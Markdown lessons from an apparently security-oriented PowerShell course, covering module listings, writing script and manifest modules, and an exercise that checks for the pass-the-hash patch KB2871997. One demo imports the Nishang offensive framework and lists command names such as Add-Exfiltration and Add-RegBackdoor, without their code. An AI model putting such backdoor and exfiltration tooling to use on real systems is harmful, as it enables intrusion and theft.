Script 0.0 NetAdapter.Format.Helper {Format-MacAddress, Format-AdapterName, Format-AdapterInstanceID, Format-LinkSpeed}
Manifest 1.0.0.0 NetConnection {Get-NetConnectionProfile, Set-NetConnectionProfile}
Manifest 1.0.0.0 NetEventPacketCapture {New-NetEventSession, Remove-NetEventSession, Get-NetEventSession, Set-NetEventSession...}
Cim 1.0.0.0 NetFirewallAddressFilter.cmdletD... {Get-NetFirewallAddressFilter, Set-NetFirewallAddressFilter}
Cim 1.0.0.0 NetFirewallApplicationFilter.cmd... {Get-NetFirewallApplicationFilter, Set-NetFirewallApplicationFilter}
Cim 1.0.0.0 NetFirewallInterfaceFilter.cmdle... {Get-NetFirewallInterfaceFilter, Set-NetFirewallInterfaceFilter}
Cim 1.0.0.0 NetFirewallInterfaceTypeFilter.c... {Get-NetFirewallInterfaceTypeFilter, Set-NetFirewallInterfaceTypeFilter}
Cim 1.0.0.0 NetFirewallPortFilter.cmdletDefi... {Get-NetFirewallPortFilter, Set-NetFirewallPortFilter}
Cim 1.0.0.0 NetFirewallProfile.cmdletDefinition {Get-NetFirewallProfile, Set-NetFirewallProfile}
Cim 1.0.0.0 NetFirewallRule.cmdletDefinition {Get-NetFirewallRule, Set-NetFirewallRule, Remove-NetFirewallRule, Rename-NetFirewallRule...}
Cim 1.0.0.0 NetFirewallSecurityFilter.cmdlet... {Get-NetFirewallSecurityFilter, Set-NetFirewallSecurityFilter}
Cim 1.0.0.0 NetFirewallServiceFilter.cmdletD... {Get-NetFirewallServiceFilter, Set-NetFirewallServiceFilter}
Cim 1.0.0.0 NetFirewallSetting.cmdletDefinition {Get-NetFirewallSetting, Set-NetFirewallSetting}
Cim 1.0.0.0 NetGPO.cmdletDefinition {Open-NetGPO, Save-NetGPO}
Script 0.0 NetIPConfiguration {Get-NetIPConfiguration, gip}
Cim 1.0.0.0 NetIPsecDospSetting.cmdletDefini... {Get-NetIPsecDospSetting, Set-NetIPsecDospSetting, Remove-NetIPsecDospSetting, New-NetIPsecDospSetting}
Cim 1.0.0.0 NetIPsecIdentity.cmdletDefinition
Cim 1.0.0.0 NetIPsecMainModeCryptoSet.cmdlet... {Get-NetIPsecMainModeCryptoSet, Set-NetIPsecMainModeCryptoSet, Remove-NetIPsecMainModeCryptoSet, Rename-NetIPsecMainModeCryptoSet...}
Cim 1.0.0.0 NetIPsecMainModeRule.cmdletDefin... {Get-NetIPsecMainModeRule, Set-NetIPsecMainModeRule, Remove-NetIPsecMainModeRule, Rename-NetIPsecMainModeRule...}
Cim 1.0.0.0 NetIPsecMainModeSA.cmdletDefinition {Get-NetIPsecMainModeSA, Remove-NetIPsecMainModeSA}
Cim 1.0.0.0 NetIPsecPhase1AuthSet.cmdletDefi... {Get-NetIPsecPhase1AuthSet, Set-NetIPsecPhase1AuthSet, Remove-NetIPsecPhase1AuthSet, Rename-NetIPsecPhase1AuthSet...}
Cim 1.0.0.0 NetIPsecPhase2AuthSet.cmdletDefi... {Get-NetIPsecPhase2AuthSet, Set-NetIPsecPhase2AuthSet, Remove-NetIPsecPhase2AuthSet, Rename-NetIPsecPhase2AuthSet...}
Cim 1.0.0.0 NetIPsecPolicyChange.cmdletDefin...
Cim 1.0.0.0 NetIPsecQuickModeCryptoSet.cmdle... {Get-NetIPsecQuickModeCryptoSet, Set-NetIPsecQuickModeCryptoSet, Remove-NetIPsecQuickModeCryptoSet, Rename-NetIPsecQuickModeCryptoSet...}
Cim 1.0.0.0 NetIPsecQuickModeSA.cmdletDefini... {Get-NetIPsecQuickModeSA, Remove-NetIPsecQuickModeSA}
Cim 1.0.0.0 NetIPsecRule.cmdletDefinition {Get-NetIPsecRule, Set-NetIPsecRule, Remove-NetIPsecRule, Rename-NetIPsecRule...}
Manifest 2.0.0.0 NetLbfo {Add-NetLbfoTeamMember, Add-NetLbfoTeamNic, Get-NetLbfoTeam, Get-NetLbfoTeamMember...}
Manifest 1.0.0.0 NetNat {Get-NetNat, Get-NetNatExternalAddress, Get-NetNatStaticMapping, Get-NetNatSession...}
Manifest 2.0.0.0 NetQos {Get-NetQosPolicy, Set-NetQosPolicy, Remove-NetQosPolicy, New-NetQosPolicy}
Manifest 2.0.0.0 NetSecurity {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...}
Manifest 1.0.0.0 NetSwitchTeam {New-NetSwitchTeam, Remove-NetSwitchTeam, Get-NetSwitchTeam, Rename-NetSwitchTeam...}
Manifest 1.0.0.0 NetTCPIP {Get-NetIPAddress, Get-NetIPInterface, Get-NetIPv4Protocol, Get-NetIPv6Protocol...}
Manifest 1.0.0.0 NetworkConnectivityStatus {Get-DAConnectionStatus, Get-NCSIPolicyConfiguration, Reset-NCSIPolicyConfiguration, Set-NCSIPolicyConfiguration}
Script 0.0 NetworkSwitchConfiguration {Restore-NetworkSwitchConfiguration, Save-NetworkSwitchConfiguration, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace...}
Script 0.0 NetworkSwitchEthernetPort {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres...
Script 0.0 NetworkSwitchFeature {Disable-NetworkSwitchFeature, Enable-NetworkSwitchFeature, Get-NetworkSwitchFeature, CmdletShouldProcess...}
Script 0.0 NetworkSwitchGlobalSettingData {Get-NetworkSwitchGlobalData, CmdletShouldProcess, Get-NetworkSwitchRegisteredProfileFromNamespace, Get-NetworkSwitchImplementationNamespace...}
Manifest 1.0.0.0 NetworkSwitchManager {Disable-NetworkSwitchEthernetPort, Enable-NetworkSwitchEthernetPort, Get-NetworkSwitchEthernetPort, Remove-NetworkSwitchEthernetPortIPAddres...
Script 0.0 NetworkSwitchVlan {Disable-NetworkSwitchVlan, Enable-NetworkSwitchVlan, Get-NetworkSwitchVlan, New-NetworkSwitchVlan...}
Manifest 1.0.0.0 NetworkTransition {Add-NetIPHttpsCertBinding, Disable-NetDnsTransitionConfiguration, Disable-NetIPHttpsProfile, Disable-NetNatTransitionConfiguration...}
Cim 1.0.0.0 OffloadDataTransferSetting Get-OffloadDataTransferSetting
Cim 1.0.0.0 Partition {Get-Partition, Remove-Partition, Resize-Partition, Get-PartitionSupportedSize...}
Manifest 1.0.0.0 PcsvDevice {Get-PcsvDevice, Start-PcsvDevice, Stop-PcsvDevice, Restart-PcsvDevice...}
Cim 1.0.0.0 PhysicalDisk {Get-PhysicalDisk, Enable-PhysicalDiskIdentification, Disable-PhysicalDiskIdentification, Reset-PhysicalDisk...}
Manifest 1.0.0.0 pki {Add-CertificateEnrollmentPolicyServer, Export-Certificate, Export-PfxCertificate, Get-CertificateAutoEnrollmentPolicy...}
Cim 1.0 PnpDevice {Get-PnpDevice, Enable-PnpDevice, Disable-PnpDevice, Get-PnpDeviceProperty}
Manifest 1.0.0.0 PnpDevice {Get-PnpDevice, Get-PnpDeviceProperty, Enable-PnpDevice, Disable-PnpDevice}
Manifest 0.0 PnpDevice.Resource
Manifest 1.1 PrintManagement {Add-Printer, Add-PrinterDriver, Add-PrinterPort, Get-PrintConfiguration...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 ProcessSet {BuildResourceCommonParameters, BuildResourceString}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 PS_BackgroundTask {Get-AppBackgroundTask, Start-AppBackgroundTask, Unregister-AppBackgroundTask}
Cim 1.0 PS_ClusteredScheduledTask_v1.0 {Get-ClusteredScheduledTask, Register-ClusteredScheduledTask, Set-ClusteredScheduledTask, Unregister-ClusteredScheduledTask}
Cim 1.0.0 PS_DnsClientNRPTGlobal_v1.0.0 {Get-DnsClientNrptGlobal, Set-DnsClientNrptGlobal}
Cim 1.0.0 PS_DnsClientNrptPolicy_v1.0.0 Get-DnsClientNrptPolicy
Cim 1.0.0 PS_DnsClientNRPTRule_v1.0.0 {Add-DnsClientNrptRule, Get-DnsClientNrptRule, Remove-DnsClientNrptRule, Set-DnsClientNrptRule}
Cim 1.0.0 PS_EapConfiguration_v1.0.0 New-EapConfiguration
Cim 1.0 ps_mmagent_v1.0 {Debug-MMAppPrelaunch, Disable-MMAgent, Enable-MMAgent, Get-MMAgent...}
Cim 1.0 PS_ScheduledTask_v1.0 {Disable-ScheduledTask, Enable-ScheduledTask, Export-ScheduledTask, Get-ScheduledTaskInfo...}
Cim 1.0.0 PS_VpnConnection_v1.0.0 {Add-VpnConnection, Get-VpnConnection, Remove-VpnConnection, Set-VpnConnection}
Cim 1.0 PS_VpnConnectionIPsecConfigurati... Set-VpnConnectionIPsecConfiguration
Cim 1.0 PS_VpnConnectionProxy_v1.0 Set-VpnConnectionProxy
Cim 1.0 PS_VpnConnectionRoute_v1.0 {Add-VpnConnectionRoute, Remove-VpnConnectionRoute}
Cim 1.0 PS_VpnConnectionTrigger_v1.0 Get-VpnConnectionTrigger
Cim 1.0 PS_VpnConnectionTriggerApplicati... {Add-VpnConnectionTriggerApplication, Remove-VpnConnectionTriggerApplication}
Cim 1.0 PS_VpnConnectionTriggerDnsConfig... {Add-VpnConnectionTriggerDnsConfiguration, Remove-VpnConnectionTriggerDnsConfiguration, Set-VpnConnectionTriggerDnsConfiguration}
Cim 1.0 PS_VpnConnectionTriggerTrustedNe... {Add-VpnConnectionTriggerTrustedNetwork, Remove-VpnConnectionTriggerTrustedNetwork, Set-VpnConnectionTriggerTrustedNetwork}
Cim 1.0 PS_VpnServerAddress_v1.0 New-VpnServerAddress
Manifest 1.1 PSDesiredStateConfiguration {Set-DscLocalConfigurationManager, Start-DscConfiguration, Test-DscConfiguration, Publish-DscConfiguration...}
Script 0.0 PSDesiredStateConfiguration {Generate-VersionInfo, Set-PSMetaConfigDocInsProcessedBeforeMeta, Get-PSMetaConfigurationProcessed, Get-PSMetaConfigDocumentInstVersionInfo...}
Script 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...}
Script 1.0.0.0 PSDiagnostics {Disable-PSTrace, Disable-PSWSManCombinedTrace, Disable-WSManTrace, Enable-PSTrace...}
Script 0.0 PSDscXMachine {Get-_InternalPSDscXMachineTR, Set-_InternalPSDscXMachineTR, Test-_InternalPSDscXMachineTR}
Binary 1.1.0.0 PSScheduledJob {New-JobTrigger, Add-JobTrigger, Remove-JobTrigger, Get-JobTrigger...}
Manifest 2.0.0.0 PSWorkflow {New-PSWorkflowExecutionOption, New-PSWorkflowSession, nwsn}
Script 0.0 PSWorkflow {New-PSWorkflowSession, nwsn}
Manifest 1.0.0.0 PSWorkflowUtility Invoke-AsWorkflow
Script 0.0 PSWorkflowUtility Invoke-AsWorkflow
Cim 2.0.0.0 Remove-DscConfigurationDocument Remove-DscConfigurationDocument
Cim 1.0.0.0 ResiliencySetting {Get-ResiliencySetting, Set-ResiliencySetting}
Cim 2.0.0.0 Restore-DscConfiguration Restore-DscConfiguration
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 0.0 RunAsHelper {Get-DomainAndUserName, Import-DscNativeMethods, IsNanoServer}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.0.0 ScheduledTasks {Get-ScheduledTask, Set-ScheduledTask, Register-ScheduledTask, Unregister-ScheduledTask...}
Manifest 2.0.0.0 SecureBoot {Confirm-SecureBootUEFI, Set-SecureBootUEFI, Get-SecureBootUEFI, Format-SecureBootUEFI...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 ServiceSet {BuildResourceCommonParameters, BuildResourceString}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Cim 1.0 SmbBandwidthLimit {Get-SmbBandwidthLimit, Remove-SmbBandwidthLimit, Set-SmbBandwidthLimit, gsmbb...}
Cim 1.0 SmbClientConfiguration {Get-SmbClientConfiguration, Set-SmbClientConfiguration, gsmbcc, ssmbcc}
Cim 1.0 SmbClientNetworkInterface {Get-SmbClientNetworkInterface, gsmbcn}
Cim 1.0 SmbConnection {Get-SmbConnection, gsmbc}
Cim 1.0 SmbMapping {Get-SmbMapping, Remove-SmbMapping, New-SmbMapping, gsmbm...}
Cim 1.0 SmbMultichannelConnection {Get-SmbMultichannelConnection, Update-SmbMultichannelConnection, gsmbmc, udsmbmc}
Cim 1.0 SmbMultichannelConstraint {Get-SmbMultichannelConstraint, Remove-SmbMultichannelConstraint, New-SmbMultichannelConstraint, gsmbt...}
Cim 1.0 SmbOpenFile {Get-SmbOpenFile, Close-SmbOpenFile, gsmbo, cssmbo}
Script 0.0 SmbScriptModule {Set-SmbPathAcl, Get-SmbDelegation, Enable-SmbDelegation, Disable-SmbDelegation...}
Cim 1.0 SmbServerConfiguration {Get-SmbServerConfiguration, Set-SmbServerConfiguration, gsmbsc, ssmbsc}
Cim 1.0 SmbServerNetworkInterface {Get-SmbServerNetworkInterface, gsmbsn}
Cim 1.0 SmbSession {Get-SmbSession, Close-SmbSession, gsmbse, cssmbse}
Cim 1.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...}
Manifest 2.0.0.0 SmbShare {Get-SmbShare, Remove-SmbShare, Set-SmbShare, Block-SmbShareAccess...}
Script 0.0 SmbShare.Format.Helper Format-LinkSpeed
Manifest 2.0.0.0 SmbWitness {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...}
Cim 1.0 SmbWitnessWmiClient {Get-SmbWitnessClient, Move-SmbWitnessClient, gsmbw, msmbw...}
Manifest 1.0.0.0 StartLayout {Export-StartLayout, Import-StartLayout, Get-StartApps}
Cim 2.0.0.0 Stop-DscConfiguration Stop-DscConfiguration
Manifest 2.0.0.0 Storage {Add-InitiatorIdToMaskingSet, Add-PartitionAccessPath, Add-PhysicalDisk, Add-TargetPortToMaskingSet...}
Cim 1.0.0.0 StorageCmdlets {Set-Disk, Set-Volume, Set-Partition, Set-PhysicalDisk...}
Cim 1.0.0.0 StorageEnclosure {Get-StorageEnclosure, Enable-StorageEnclosureIdentification, Disable-StorageEnclosureIdentification, Get-StorageEnclosureVendorData}
Cim 1.0.0.0 StorageHealth {Get-StorageHealth, Get-StorageHealthSettingInternal, Set-StorageHealthSettingInternal, Remove-StorageHealthSettingInternal}
Cim 1.0.0.0 StorageJob {Get-StorageJob, Stop-StorageJob}
Cim 1.0.0.0 StorageNode Get-StorageNode
Cim 1.0.0.0 StoragePool {Get-StoragePool, New-VirtualDisk, New-StorageTier, Remove-StoragePool...}
Cim 1.0.0.0 StorageProvider {Get-StorageProvider, Update-StorageProviderCache, Register-StorageSubsystem, Unregister-StorageSubsystem...}
Cim 1.0.0.0 StorageReliabilityCounter {Get-StorageReliabilityCounterDeprecated, Reset-StorageReliabilityCounter}
Script 0.0 StorageScripts {CreateErrorRecord, Get-PhysicalDiskStorageNodeView, Get-DiskStorageNodeView, Get-StorageEnclosureStorageNodeView...}
Cim 1.0.0.0 StorageSetting {Get-StorageSetting, Set-StorageSetting, Update-HostStorageCache}
Cim 1.0.0.0 StorageSubSystem {Get-StorageSubSystem, New-StoragePool, New-StorageSubsystemVirtualDisk, New-MaskingSet...}
Cim 1.0.0.0 StorageTier {Get-StorageTier, Remove-StorageTier, Resize-StorageTier, Get-StorageTierSupportedSize}
Cim 1.0.0.0 TargetPort Get-TargetPort
Cim 1.0.0.0 TargetPortal Get-TargetPortal
Script 0.0 TestDtc {Get-DAPolicyChange, New-NetIPsecAuthProposal, New-NetIPsecMainModeCryptoProposal, New-NetIPsecQuickModeCryptoProposal...}
Script 0.0 Test-NetConnection {Test-NetConnection, TNC}
Manifest 2.0.0.0 tls {New-TlsSessionTicketKey, Enable-TlsSessionTicketKey, Disable-TlsSessionTicketKey, Export-TlsSessionTicketKey...}
Manifest 1.0.0.0 TroubleshootingPack {Get-TroubleshootingPack, Invoke-TroubleshootingPack}
Manifest 2.0.0.0 TrustedPlatformModule {Get-Tpm, Initialize-Tpm, Clear-Tpm, Unblock-Tpm...}
Binary 2.1.639.0 UEV {Clear-UevConfiguration, Clear-UevAppxPackage, Restore-UevBackup, Set-UevTemplateProfile...}
Cim 1.0.0.0 VirtualDisk {Get-VirtualDisk, Remove-VirtualDisk, Show-VirtualDisk, Hide-VirtualDisk...}
Cim 1.0.0.0 Volume {Get-Volume, Format-Volume, Repair-Volume, Optimize-Volume...}
Manifest 2.0.0.0 VpnClient {Add-VpnConnection, Set-VpnConnection, Remove-VpnConnection, Get-VpnConnection...}
Manifest 1.0.0.0 Wdac {Get-OdbcDriver, Set-OdbcDriver, Get-OdbcDsn, Add-OdbcDsn...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Binary 1.0 WebDownloadManager {Get-DscDocument, Get-DscModule, Get-DscAction, Send-DscStatus...}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.0.0 WindowsDeveloperLicense {Get-WindowsDeveloperLicense, Unregister-WindowsDeveloperLicense, Show-WindowsDeveloperLicenseRegistration}
Script 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}
Script 1.0 WindowsErrorReporting {Enable-WindowsErrorReporting, Disable-WindowsErrorReporting, Get-WindowsErrorReporting}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 WindowsFeatureSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString}
Script 1.0 WindowsOptionalFeatureSet {BuildResourceCommonParameters, BuildResourceString}
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCClassResources
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0 WindowsPackageCab
Script 1.0 WindowsPackageCab
Directory: C:\Windows\system32\WindowsPowerShell\v1.0\Modules
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 1.0.0.0 WindowsSearch {Get-WindowsSearchSetting, Set-WindowsSearchSetting}
Manifest 1.0.0.0 WindowsUpdate Get-WindowsUpdateLog
Script 0.0 WindowsUpdateLog Get-WindowsUpdateLog
PS C:\Users\Windows10-32>
```
- Loading/Importing Modules
```PowerShell
PS C:\Users\Windows10-32> Import-Module <Path of the module>
```
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1
WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module
command again with the Verbose parameter. For a list of approved verbs, type Get-Verb.
WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~
PS C:\Users\Administrator\Desktop\nishang-master>
```
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...}
PS C:\Users\Administrator\Desktop\nishang-master>
```
- PSModulePath
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> $env:PSModulePath
C:\Users\Administrator\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PS C:\Users\Administrator\Desktop\nishang-master>
```
- Unloading/Removing Modules
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 0.0 nishang {Add-Exfiltration, Add-Persistence, Add-RegBackdoor, Add-ScrnSaveBackdoor...}
PS C:\Users\Administrator\Desktop\nishang-master>
```
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> Remove-Module nishang
```
```PowerShell
PS C:\Users\Administrator\Desktop\nishang-master> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
PS C:\Users\Administrator\Desktop\nishang-master>
```
- [Different types of Modules](https://msdn.microsoft.com/en-us/library/dd878324(v=vs.85).aspx)
- Script Modules
- Binary Modules
- Manifest Modules
- Dynamic Modules
================================================
FILE: 18-Modules-in-Powershell-Part-2.md
================================================
#### 18. Modules in Powershell Part 2
###### Writing Modules
```Show-AdvancedScript.psm1```
```PowerShell
function Show-AdvancedScript
{
[CmdletBinding( SupportsShouldProcess = $True)]
param(
[Parameter()]
$Global:FilePath
)
Write-Verbose "Deleting $FilePath"
if ($PSCmdlet.ShouldProcess("$FilePath", "Deleting file permanently"))
{
Remove-Item $FilePath
}
}
function Test-FileExistence
{
Test-Path $FilePath
}
function DoNoNeedToShow
{
Write-Output "No Need to show this to user"
}
Export-ModuleMember -Function *-*
```
- ```Import``` the module
```PowerShell
PS C:\Users\Windows10-32> cd .\Desktop
PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1
PS C:\Users\Windows10-32\Desktop> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet}
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 0.0 Show-AdvancedScript {Show-AdvancedScript, Test-FileExistence}
PS C:\Users\Windows10-32\Desktop>
```
```PowerShell
PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1 -Verbose
VERBOSE: Loading module from path 'C:\Users\Windows10-32\Desktop\Show-AdvancedScript.psm1'.
VERBOSE: Importing function 'Show-AdvancedScript'.
VERBOSE: Importing function 'Test-FileExistence'.
PS C:\Users\Windows10-32\Desktop>
```
- List the ```functions``` of a module
```PowerShell
PS C:\Users\Windows10-32\Desktop> Get-Command -Module Show-AdvancedScript
CommandType Name Version Source
----------- ---- ------- ------
Function Show-AdvancedScript 0.0 Show-AdvancedScript
Function Test-FileExistence 0.0 Show-AdvancedScript
PS C:\Users\Windows10-32\Desktop>
```
- Run the ```functions``` of the ```module```
```PowerShell
PS C:\Users\Administrator\Desktop\Code\18> Show-AdvancedScript C:\Users\Administrator\Desktop\1.txt
PS C:\Users\Administrator\Desktop\Code\18> Test-FileExistence C:\Users\Administrator\Desktop\1.txt
False
PS C:\Users\Administrator\Desktop\Code\18>
```
- ```Remove``` module
```PowerShell
PS C:\Users\Windows10-32\Desktop> Remove-Module Show-AdvancedScript
```
```PowerShell
PS C:\Users\Windows10-32\Desktop> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet}
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
PS C:\Users\Windows10-32\Desktop>
```
- Controlling ```visibility```
```PowerShell
PS C:\Users\Windows10-32\Desktop> Remove-Module Show-AdvancedScript
```
```PowerShell
PS C:\Users\Windows10-32\Desktop> Get-Module
ModuleType Version Name ExportedCommands
---------- ------- ---- ----------------
Script 1.0.0.0 ISE {Get-IseSnippet, Import-IseSnippet, New-IseSnippet}
Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...}
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
PS C:\Users\Windows10-32\Desktop>
```
```PowerShell
PS C:\Users\Windows10-32\Desktop> Import-Module .\Show-AdvancedScript.psm1 -Verbose
VERBOSE: Importing function 'Show-AdvancedScript'.
VERBOSE: Importing function 'Test-FileExistence'.
PS C:\Users\Windows10-32\Desktop>
```
###### Exercise
Write a module which checks for the presence of KB2871997 (the Pass the hash fix). The module must have at least two functions:
- One which does the actual stuff which should not be exported.
- Another for displaying the results to the user with a warning if the patch is not present.
```Check-PassTheHash.psm1```
```PowerShell
function Check-PassTheHash
{
$hotfixes = "KB2871997"
#checks the computer it's run on if any of the listed hotfixes are present
$hotfix = Get-HotFix -ComputerName $env:computername | Where-Object {$hotfixes -contains $_.HotfixID} | Select-Object -property "HotFixID"
$Global:out = Get-HotFix | Where-Object {$hotfixes -contains $_.HotfixID}
}
function Result-PassTheHash
{
if ($out)
{
"Found HotFix: " + $out.HotFixID
}
else
{
"Didn't Find HotFix"
}
}
```
```PowerShell
PS C:\Users\Administrator\Desktop> Import-Module .\Check-PassTheHash.psm1
WARNING: The names of some imported commands from the module 'Check-PassTheHash' include unapproved verbs that might make them less discoverab
le. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs,
type Get-Verb.
PS C:\Users\Administrator\Desktop>
```
```PowerShell
PS C:\Users\Administrator\Desktop> Get-Command -Module Check-PassTheHash
CommandType Name ModuleName
----------- ---- ----------
Function Check-PassTheHash Check-PassTheHash
Function Result-PassTheHash Check-PassTheHash
PS C:\Users\Administrator\Desktop>
```
```PowerShell
PS C:\Users\Administrator\Desktop> Check-PassTheHash
```
```PowerShell
PS C:\Users\Administrator\Desktop> Result-PassTheHash
Didn't Find HotFix
PS C:\Users\Administrator\Desktop>
```
================================================
FILE: 19-Modules-in-Powershell-Part-3.md
================================================
#### 19. Modules in Powershell Part 3
###### Manifest Modules
```Show-AdvancedScript.psd1```
```PowerShell
#
# Module manifest for module 'Show-AdvancedScript'
#
# Generated by: Administrator
#
# Generated on: 7/11/2017
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'Show-AdvancedScript.psm1'
# Version number of this module.
ModuleVersion = '1.0'
# ID used to uniquely identify this module
GUID = '57ee3f4b-356b-4417-90ab-134b533f845e'
# Author of this module
Author = 'Administrator'
# Company or vendor of this module
CompanyName = 'Unknown'
# Copyright statement for this module
Copyright = '(c) 2017 Administrator. All rights reserved.'
# Description of the functionality provided by this module
# Description = ''
# Minimum version of the Windows PowerShell engine required by this module
# PowerShellVersion = ''
# Name of the Windows PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the Windows PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module
# CLRVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
# RequiredModules = @()
# Assemblies that must be loaded prior to importing this module
# RequiredAssemblies = @()
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module
FunctionsToExport = '*_*'
# Cmdlets to export from this module
CmdletsToExport = '*'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module
AliasesToExport = '*'
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
```
- Creating a ```Manifest```
```PowerShell
PS C:\Users\Administrator\Desktop\19> ls
Directory: C:\Users\Administrator\Desktop\19
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 7/11/2017 10:45 AM 494 Show-AdvancedScript.psm1
PS C:\Users\Administrator\Desktop\19>
```
```PowerShell
PS C:\Users\Administrator\Desktop\19> New-ModuleManifest .\Show-AdvancedScript.psd1
```
```PowerShell
PS C:\Users\Administrator\Desktop\19> ls
Directory: C:\Users\Administrator\Desktop\19
